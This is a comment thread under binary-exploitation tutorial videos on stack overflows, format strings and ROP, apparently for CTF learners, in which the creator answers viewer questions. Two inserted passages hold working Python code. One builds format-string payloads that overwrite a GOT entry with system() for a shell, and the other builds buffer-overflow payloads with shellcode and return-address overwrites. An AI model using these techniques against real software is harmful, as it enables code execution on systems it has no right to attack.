I love your way of explaining things, I've been checking several sources for this stuff and so far this is the best for my way of thinking. GG
@ppipn569 5 days ago
how do you know this 216f is format specify?
@RazviOverflow 4 days ago
What do you mean?
@ARINAGRAWAL-cg2be 8 days ago
Thank you so much, was stressing and struggling with this implementation and library inclusion. Success with Visual Studio 2022👍
@RazviOverflow 7 days ago
You are welcome, glad I could help :)
@davidmohan2698 9 days ago
Why do you minus shellcode? why do you not add them all together like in the previous videos?
@RazviOverflow 9 days ago
I'm not doing -shellcode, I'm doing - len(shellcode). That's because I want to pad with A's 0x50 minus the bytes of the shellcode, and I don't want to manually count them. So I use 0x50 - len(shellcode)
@davidmohan2698 9 days ago
@@RazviOverflow Oh ok, what is the purpose of subtracting 0x50 from the length of the shellcode?
@davidmohan2698 9 days ago
ignore me I think I figured it out.
@RazviOverflow 7 days ago
@@davidmohan2698 No worries at all. If you still have any doubt ask me, I'll do my best to clarify it.
@royweiss1 13 days ago
Thanks A LOT!!!
@RazviOverflow 12 days ago
You are welcome
@katchen2626 17 days ago
Man these are great! Please make more.
@RazviOverflow 16 days ago
Thank you :)
@RazviOverflow 17 days ago
If anyone wonders how to configure Cutter to look like the instance you see in the video, I have prepared a step-by-step configuration video: kzbin.info/www/bejne/sKO7cmZ3eMRpa5o Hope this helps!
@_vox5189 18 days ago
Polino, I miss you
@user-eh1vi3jz1c 18 days ago
You know what u doing hehe
@RazviOverflow 18 days ago
I wish -.-'
@HoneyBravoLui 20 days ago
Hi POLIMI
@Fiona-hs2ys 23 days ago
Hi, what debugger do you use?
@RazviOverflow 22 days ago
Hello. I'm using Cutter. Here's a video of its configuration: kzbin.info/www/bejne/sKO7cmZ3eMRpa5o
@Fiona-hs2ys 22 days ago
@@RazviOverflow 🙏 Thank you! And your videos are great, I am finally understanding binary ex/rev!😀
@RazviOverflow 22 days ago
@@Fiona-hs2ys Glad to help!
@RazviOverflow 20 days ago
@@Fiona-hs2ys Glad to help. There's no money that can buy the feeling of progress, especially in the field of rev/pwn! :)
@ragnarlothbrok367 a month ago
I don't understand a shit from all of this, I don't know what the flow or next instruction is when you talk about things, I don't see the context
@RazviOverflow a month ago
You are the first one (so far) pointing out the context is missing. Please tell me why and how the video could be improved.
@ragnarlothbrok367 a month ago
@@RazviOverflow Just look at the illustration at 12:30; it may not even be your fault, just assembly is... insane, everything goes everywhere all the time and I fail to map this in my brain
@RazviOverflow a month ago
@@ragnarlothbrok367 Ok, then the problem is not the video. Have you tried watching easier videos?
@richardnelson8121 a month ago
Promo SM 😜
@user-pg9te8ug1j a month ago
Wow - this is by far the best explanation I've seen on the topic so far. Thank you very much!
@RazviOverflow a month ago
Glad you liked the video :)
@lincoln9521 a month ago
Hello Razvi! Thank you very much for your videos, the explanations are very clear, thanks again 😁
@RazviOverflow a month ago
You are more than welcome. I'm happy you like my videos and they help in any way :)
@mihailobabic7366 a month ago
Thanks!
@RazviOverflow a month ago
I'm happy you liked the video :) And thank you very much for the super!
@m1zo51 a month ago
Did everything in the video; unfortunately it did not work. I was still getting an error about Visual Studio not being able to find header files. The only fix for me was installing it via vcpkg.
@rgb123-jm5mc a month ago
Bro thank you man
@RazviOverflow a month ago
You are welcome
@perseusz1691 a month ago
Thank you very much! It works for me in Visual Studio Code 2022.
@RazviOverflow a month ago
You are welcome :)
@kinezi7898 a month ago
Can you edit the video with visual studio 2022? I get many errors.
@RazviOverflow a month ago
I don't think I will... Why don't you try using VS2019?
@kinezi7898 a month ago
@@RazviOverflow It's done, thank you. Is it also valid for Cryptlib and not for others? For example, when I look on the internet, they import the Cryptopp library. Can you post videos for others? Again, health to your hands, labor and mouth. You are a life saver <3
@RazviOverflow a month ago
@@kinezi7898 I don't think I will record videos on this topic, but I will sure do in the areas of binary exploitation and reverse engineering. Glad my video helped you. Cheers :)
@kinezi7898 a month ago
@@RazviOverflow Can I ask two more questions? I've been trying to download OpenSSL lately and I'm getting errors; maybe it's because of what the guy did, or maybe it's outdated, because I'm typing exactly what he said in the terminal. Can you make a separate OpenSSL installation video? Also, you made the Cryptlib library in this video; can you make others like Cryptopp Cryptest?
@user-kb8bc9eu4r 2 months ago
The chef is back to cook 🔥, could you start with heap exploitation? Also, your series is the best for pwn on YouTube
@RazviOverflow 2 months ago
Hi there! I will consider getting into heap exploitation once I'm done with all the stack stuff I got in mind :) Thank you
@cozt7050 2 months ago
legend is back
@RazviOverflow 2 months ago
🫂
@incursio1122 2 months ago
Thanks a lot for this, really needed this. I was really confused when I was watching your pwn101 series and my disassembly had variables relative to the stack and not rbp. Thanks a lot for this video, sir.
@RazviOverflow 2 months ago
Glad it helped, that's the main purpose of my videos :)
@abhinavbansal-cc8gr 2 months ago
We need more videos from you....... why did you stop making them??
@RazviOverflow 2 months ago
I did not stop, nor do I plan to stop... only that making videos takes some time. Time that I do not always have. Thank you for your support :)
@theviralhub245 2 months ago
Wow Razvi. So glad you posted this video! Do you have plans to go down the reverse engineering route of videos? Or are you going to continue down the path of more complex exploitation techniques? Either way, I'm all here for it!
@RazviOverflow 2 months ago
Regarding reversing, it's something that has been on my mind for some time now. If so, what would you like to see?
@theviralhub245 2 months ago
@@RazviOverflow awesome. I’d like to see how you would approach reversing both Linux and PE files and how you would translate the assembly instructions back to C pseudo code to understand overall program logic. Maybe also do some Windows Keygen challenges where you write Key generators for various executables. I’m sure many others like myself would like to improve their overall reversing skills so a clear cut methodology on how to approach different challenges would be really cool to see and learn from. Thanks Razvi.
@RazviOverflow 2 months ago
@@theviralhub245 Thank you for your ideas, I'll definitely give it a thought. Although I cannot promise any specific video (at least in the short term), there is nevertheless a reversing-related video I'd like to do any time soon.
@theviralhub245 2 months ago
@@RazviOverflow sure. at the end of the day the video choice is all yours. Make do with it as you please and please take your time. 🙏🏾💯. This is top tier content
@RazviOverflow 2 months ago
@@theviralhub245 Thank you for your support :)
@marcovalentinoalvarado3290 2 months ago
Ooooff new video ❤🔥 Yesterday in the morning I did all the pwn101 series with your videos on the side, and I was thinking about you and wondering about your next video, and here it is! Thanks for sharing, man!
@RazviOverflow 2 months ago
You are welcome :) I'm happy my videos helped you
@ELFx86 2 months ago
Thanks !!!!
@RazviOverflow 2 months ago
You are welcome :)
@marcovalentinoalvarado3290 2 months ago
Each video goes up in quality, thank you so much for sharing!
@RazviOverflow 2 months ago
You are welcome, thank you :)
@samthelamb0718 2 months ago
What do you do if you need to write a larger value? What would you do if you needed to split the write three times? I'm doing a CTF and it requires me to overwrite a variable with a very large value, because whenever I try to pad it to be eight-byte aligned too, it just EOFs right off the bat.
@RazviOverflow 2 months ago
You can split the write using %hn, which will write just 2 bytes, or even %hhn, which will write just one. Regarding the values, just consider the bytes you have to write. Imagine you have printed so far 0xDEAD bytes and you are using %hhn to write into any address: it will write just the 'AD'. If you need to write a lower value, just "overflow" the sum; e.g. 0xDF01 will write only the '01'.
@samthelamb0718 2 months ago
Yeah, thanks, I didn't know that. I'm overwriting the GOT with a libc address because puts is called right after the format string vuln with /bin/sh as argument, meaning if I get the system address into the GOT entry where puts is, I will get a shell. Simple, right? The address is a 48-bit value rather than a 32-bit one; what should I do if it's a 48-bit value, because I'm running into trouble getting that into the GOT address. Is there a way to debug these exploits? @@RazviOverflow
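An added worked example of the write-splitting discussed in this exchange; it is not code from the video or from either commenter's exploit. A 6-byte libc address is cut into %hn (or %hhn) chunks, the padding before each write is computed modulo the chunk width so the running counter can "overflow" down to a smaller value as described above, and a small model of printf's %c/%N$hn handling checks the result offline. The GOT slot 0x404018, the libc address, the argument index 6 and the number of 8-byte slots reserved for the format text are constructed assumptions, not values from the challenge; on a real target the index comes from the usual %N$p probing.

```python
import re
import struct

# Bytes stored by each %n variant.
WIDTH_BYTES = {"hhn": 1, "hn": 2, "n": 4}


def split_value(addr, value, size, chunk_bytes):
    """Cut a little-endian `value` of `size` bytes into chunks of `chunk_bytes`,
    each paired with the address it has to land on (addr, addr+chunk, ...)."""
    mask = (1 << (8 * chunk_bytes)) - 1
    return [(addr + i, (value >> (8 * i)) & mask) for i in range(0, size, chunk_bytes)]


def fmt_payload(chunks, chunk_bytes, first_arg, fmt_slots, printed=0):
    """Build <format text><padding><addresses>.

    first_arg: %N$ index of the first 8-byte word of our own input on the stack
               (assumption: found beforehand with %N$p probing).
    fmt_slots: 8-byte words reserved for the format text; the addresses follow it.
    printed:   bytes the program already printed before our text (counts for %n).
    """
    mod = 1 << (8 * chunk_bytes)
    spec = {1: "hhn", 2: "hn", 4: "n"}[chunk_bytes]
    fmt = b""
    counter = printed
    for i, (_, chunk) in enumerate(chunks):
        # Padding modulo the chunk width: if the counter is already above the
        # wanted chunk, we "overflow" past the width so only the low bytes match.
        pad = (chunk - counter) % mod
        if pad:
            fmt += b"%%%dc" % pad
            counter += pad
        fmt += b"%%%d$%s" % (first_arg + fmt_slots + i, spec.encode())
    room = fmt_slots * 8
    if len(fmt) > room:
        raise ValueError("format text needs more than %d reserved slots" % fmt_slots)
    addrs = b"".join(struct.pack("<Q", a) for a, _ in chunks)
    return fmt.ljust(room, b"A") + addrs


def simulate_printf(payload, first_arg, printed=0):
    """Minimal printf model: only %<n>c and %<k>$(hhn|hn|n). Stops at the first
    NUL like the real function, so the address bytes are never parsed as text."""
    text = payload.split(b"\x00", 1)[0]
    memory = {}
    counter = printed
    for m in re.finditer(rb"%(\d*)c|%(\d+)\$(hhn|hn|n)", text):
        if m.group(3) is None:
            counter += int(m.group(1) or b"1")
        else:
            word = (int(m.group(2)) - first_arg) * 8
            addr = struct.unpack_from("<Q", payload, word)[0]
            for j in range(WIDTH_BYTES[m.group(3).decode()]):
                memory[addr + j] = (counter >> (8 * j)) & 0xFF
    return memory


def read_mem(memory, addr, size):
    return int.from_bytes(bytes(memory.get(addr + j, 0) for j in range(size)), "little")


if __name__ == "__main__":
    GOT_PUTS = 0x404018          # constructed GOT slot
    SYSTEM = 0x7FFFF7E4F2D0      # constructed libc address (6 significant bytes)
    chunks = split_value(GOT_PUTS, SYSTEM, 6, 2)
    payload = fmt_payload(chunks, 2, first_arg=6, fmt_slots=6)
    print(payload)
    mem = simulate_printf(payload, first_arg=6)
    print(hex(read_mem(mem, GOT_PUTS, 6)))  # -> 0x7ffff7e4f2d0
```

The three %hn writes cost roughly 100 KB of printed padding in total, which is fine over a pipe but worth knowing when the target is slow. Once the format string and argument index are confirmed this way, pwntools' fmtstr_payload automates the same construction.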
@rhyswong6779 2 months ago
Sorry, as I am kind of new to using Cutter, but when I use Cutter on my end my theory is that it somehow adds the 0x8 of the ebp to the variable? So instead of it being 0x20 like in the video, it's 0x28. I say this because my exploit doesn't work if I add the extra padding for the 8 bytes on top of 0x28.
@RazviOverflow 2 months ago
Hello, take a look at this question: reverseengineering.stackexchange.com/questions/32317/cutter-shows-addresses-relative-to-stack-but-not-rbp-how-to-change-it
@kam7621 2 months ago
Hi, great write up! One question - how do you enable additional descriptions next to each line in cutter in Graph view, for example mov eax, 0 ; moves data from src to dst
@RazviOverflow 2 months ago
By enabling the debugging settings of Cutter. There are several checks you can enable/disable, and one of them is adding comments next to each instruction.
@incursio1122 2 months ago
You are god🙏🙏
@RazviOverflow 2 months ago
Glad to help :)
@shichimenchoo 3 months ago
Cool video, thanks a lot
@RazviOverflow 3 months ago
You are welcome :)
@Ikd19qqw 3 months ago
Bro, I can't get how you take a shell without using shellcode? Or is that because of using the 'interactive' func?
@RazviOverflow 3 months ago
No, the "interactive" function from pwntools just pipes the stdin to the stdout of the process, so I can interact with it. Hence its name. Around 5:15 lies the vulnerability and its corresponding explanation; that's how and why you get a shell.
@samthelamb0718 3 months ago
Sorry for the noob question, but how do you get Cutter to look so good with the comments and theme and all those convenient-looking features?
@RazviOverflow 3 months ago
I think I've mentioned it in another video, not sure... You just have to "enable" several of its debugging options. They are pretty easy to spot if you try to configure your Cutter instance.
@rhyswong6779 2 months ago
I was wondering the same as well, especially since the variables aren't highlighted, which makes them a little bit harder to spot @@RazviOverflow
@shlomighty 3 months ago
Life saver. thank you so much!
@RazviOverflow 3 months ago
Glad to help!
@r3plican 3 months ago
Why must we put 0xc0d3 first? Why not 0xc0ff33 first instead?
@RazviOverflow 3 months ago
Around 7:50 lies the explanation, it is because writing into memory happens from lower towards higher memory addresses, whereas the stack grows from higher towards lower addresses. Writing into memory happens in the fashion of: rbp-0x70, rbp-0x6F, rbp-0x6E, rbp-0x6D, and so on... so you are first overwriting rbp-0x8 and then rbp-0x4.
@N0RT0X 4 months ago
A thousand thanks for this series. Eternally grateful
@RazviOverflow 4 months ago
I'm glad it is useful to you :)
@regas6441 4 months ago
Thanks for the explanation on the MOVAPS issue, been getting it and didn't really understand what was going on.
@RazviOverflow 4 months ago
You are most welcome :)
@regas6441 4 months ago
Excellent content, this actually helped me a lot. Please keep posting!
@RazviOverflow 4 months ago
Glad it helped!
@MHg2NjcyNmY3OTY0 4 months ago
Very useful
@Error-NoContextFound 4 months ago
Not me looking for the script to do so 😗
@RazviOverflow 3 months ago
Don't cheat, learn the concepts :)
@user-ng9uv3hs3k 5 months ago
This is seriously the best explanation I've found on ROP. The explanation is so clear and detailed. So helpful 😄 Loved it!
@RazviOverflow 5 months ago
I'm happy it helped you :)
@davidedg80 5 months ago
Life saver! All the required steps clearly described! I was struggling with the MTd/MDd options as I was not even aware of what they are...! Thx!!
@RazviOverflow 5 months ago
Glad it helped :) You are more than welcome
@OliLabVideo 5 months ago
Thanks, that helped!
@sameerpurwar 5 months ago
In the above case, is the libc library loaded at startup, or does the linker load the entire libc library into memory and resolve the symbol only when the puts function is called?
@RazviOverflow 5 months ago
I recommend you reading about "lazy binding" syst3mfailure.io/ret2dl_resolve/
@krimenet4376 5 months ago
bro! Thank you very much. I've tried package managers and others, and this is the first video I come across that works for me and compiles without any errors. Thank you very much, you've earned my subscription. Thank you!!!
@RazviOverflow 5 months ago
Glad to help :) You are welcome
@samratgupta731 5 months ago
What if I want to edit the values that are placed lower in memory? Is there a way to underflow or something?
@RazviOverflow 5 months ago
No, because writing into memory always happens from lower towards higher addresses.
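An added helper, not code from the video or from RazviOverflow's scripts, that ties together three points raised in these comments: the `0x50 - len(shellcode)` padding from the davidmohan2698 thread, the reply to r3plican about why the value at rbp-0x8 is written before the one at rbp-0x4 (the overflow copies upward from the buffer start), and the reply just above about locals below the buffer being unreachable. The buffer offsets 0x70 and 0x50 and the two target values come from the comments; the NOP-sled "shellcode", the saved-rbp filler and the return address in the usage are constructed placeholders.

```python
import struct


def p32(x):
    return struct.pack("<I", x)


def p64(x):
    return struct.pack("<Q", x)


def build_stack_payload(buf_off, writes, shellcode=b"", ret=None,
                        saved_rbp=b"B" * 8, fill=b"A"):
    """Assemble an overflow payload for a buffer that starts at rbp-buf_off.

    writes maps <offset below rbp> -> (value, size in bytes), e.g.
    {0x8: (0xc0d3, 4), 0x4: (0xc0ff33, 4)}.  The overflow copies from the
    buffer start towards higher addresses, so the target with the largest
    offset (lowest address, rbp-0x8) is laid down first; anything below the
    buffer start (offset > buf_off) is rejected because no amount of input
    reaches it.  If ret is given, the saved rbp and return address follow
    the locals; the padding is computed, never counted by hand.
    """
    payload = bytearray(shellcode)
    # Position of every target relative to the first byte of the buffer.
    targets = sorted((buf_off - off, val, size) for off, (val, size) in writes.items())
    for pos, val, size in targets:
        if pos < 0:
            raise ValueError(
                "target at rbp-%#x lies below the buffer start: not reachable" % (buf_off - pos))
        if pos < len(payload):
            raise ValueError("target at buffer+%#x overlaps bytes already placed" % pos)
        payload += fill * (pos - len(payload))
        payload += val.to_bytes(size, "little")
    if ret is not None:
        if len(payload) > buf_off:
            raise ValueError("placed data runs past the saved rbp")
        payload += fill * (buf_off - len(payload)) + saved_rbp + p64(ret)
    return bytes(payload)


if __name__ == "__main__":
    # Two locals at rbp-0x8 and rbp-0x4 behind a buffer at rbp-0x70.
    locals_payload = build_stack_payload(0x70, {0x8: (0xC0D3, 4), 0x4: (0xC0FF33, 4)})
    print(locals_payload.hex())
    # Shellcode in a 0x50-byte buffer, then saved rbp and a constructed return address.
    sled = b"\x90" * 0x20  # constructed stand-in for real shellcode
    ret_payload = build_stack_payload(0x50, {}, shellcode=sled, ret=0x401136)
    print(len(ret_payload), ret_payload[-8:].hex())
```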
@davidshipman5964 5 months ago
Great video! I learned a lot. It is crazy that you can do things like this lol